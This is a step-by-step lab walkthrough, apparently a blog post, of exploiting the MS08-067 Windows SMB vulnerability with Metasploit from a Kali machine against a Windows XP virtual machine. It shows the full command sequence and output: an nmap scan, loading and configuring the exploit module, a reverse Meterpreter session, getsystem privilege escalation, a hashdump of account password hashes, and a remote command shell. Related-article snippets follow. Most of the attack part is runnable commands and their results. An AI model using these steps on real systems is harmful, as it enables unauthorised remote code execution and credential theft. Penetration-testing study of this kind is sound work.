tags: Safety
The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability." If a user receives a specially crafted RPC request on an affected system, the vulnerability may allow remote code execution. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, attackers may use this vulnerability to run arbitrary code without authentication. This vulnerability can be used to carry out worm attacks.
The following experiment is a local test environment, a Kali host attack machine, and a Windows Xp target machine
Kali attack machine: 192.168.34.220
windows Xp: 192.168.34.189
Step one, start postgresql
root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
Step two, start metasploit
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit!
;@'. __*__,." |--- _____________/
'(.,...."/
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015071402 ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
Step 3: Check the data connection status
msf > db_status
[*] postgresql connected to msf3
Step 4. Start nmap scan
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https?
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp open multiling-http?
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 6002/tcp open http SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open afs3-callback?
[*] Nmap: 7002/tcp open http SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu%
[*] Nmap: SF:r(Kerberos,5,"x01txe0x06")%r(SMBProgNeg,5,"x01txe0x06")%r(T
[*] Nmap: SF:erminalServer,A,"x01txe0x06x01txe0x06")%r(WMSRequest,5,"x0
[*] Nmap: SF:1txe0x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | Conficker: Likely CLEAN
[*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_ MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds
Step 5, search for vulnerability modules
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
Step 6, view configuration options
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Step seven, configuration parameters
msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189
RHOST => 192.168.34.189
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.189 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.189 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Step 8. Start using
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.34.220:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
Step 9: Return to the shell successfully, the operation of meterpreter
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).hashdump
meterpreter > hashdump
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::meterpreter > shell
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.34.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.34.254
C:WINDOWSsystem32>net user
net user
User accounts for \
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
IUSR_DH-CA8822AB9589 IWAM_DH-CA8822AB9589 SUPPORT_388945a0
The command completed with one or more errors.
For the target drone in the shared content, please search on Baidu.
MS08-067 vulnerability reproduction experiment Realize environment preparation: Attack machine: kali (IP: 192.168.153.129) Target drone: Windows XP (IP: 192.168.153.128) Attack tools: metasploit-frame...
Metasploit ms08_067 vulnerability attack practice Environmental preparation Two virtual machines, one is kali, as an attacker, and the other is windows xp sp3 Host IP kali 192.168.78.145 windows xp sp...
A vulnerability recovery experiment made by a network space security professional student, if there is a mistake or improvement, please advise. MS08-067 Vulnerability Analysis and Reclaim content MS08...
The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: various versions of Windows 2000/XP/Server 2003/Vista/Server 2008, and even Windows 7 Pro-Beta in...
Summary:Detailed explanation MS08-067 Remote Code Perform Vulnerability (CVE-2008-4250) and defense process This article shares from Huawei Yunshi District "Windows Vulnerability Utilization MS08...
(For testing only, but now it can not be used Reprinted from: http: //www.cnhonkerarmy.com/thread-167512-1-1.html) Detailed Vulnerability: 44...
table of Contents Vulnerability description Influence system Vulnerability detection Exploit Vulnerability hardening Vulnerability description A remote code execution vulnerability exists ...
This vulnerability of ms08-067 is one of the most basic vulnerabilities when we are learning msf. Many tutorials will mention this vulnerability, but this vulnerability is very picky about the reprodu...
lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...
Vulnerability CVE-2008-4250 Microsoft No. MS08-067, according to Microsoft Security Vulnerability Announcement, Basic understanding of its principles: MS08-067 Vulnerability is triggered by calling th...